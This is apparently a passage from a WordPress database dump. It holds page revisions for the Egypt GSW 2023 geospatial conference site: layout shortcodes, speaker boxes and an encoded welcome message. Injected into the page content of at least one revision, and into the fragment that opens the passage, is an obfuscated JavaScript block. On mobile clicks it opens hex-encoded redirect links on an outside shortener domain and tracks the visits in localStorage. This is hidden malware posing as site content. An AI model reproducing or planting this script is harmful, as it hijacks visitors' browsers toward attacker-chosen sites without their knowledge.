_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 21:58:03','2022-11-09 21:58:03','',3233,'https://gsw2023.com/?p=3255',0,'revision','',0),
(3256,1,'2022-11-09 22:01:51','2022-11-09 22:01:51','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][/vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][/vc_column][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"][/bsf-info-box][vc_row][vc_column][vc_column_text]\r\n\r\n[video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video]\r\n\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 22:01:51','2022-11-09 22:01:51','',3233,'https://gsw2023.com/?p=3256',0,'revision','',0),
(3257,1,'2022-11-09 22:03:43','2022-11-09 22:03:43','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][vc_column_text]\r\n\r\n[video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video]\r\n\r\n[/vc_column_text][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][/vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][/vc_column][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" 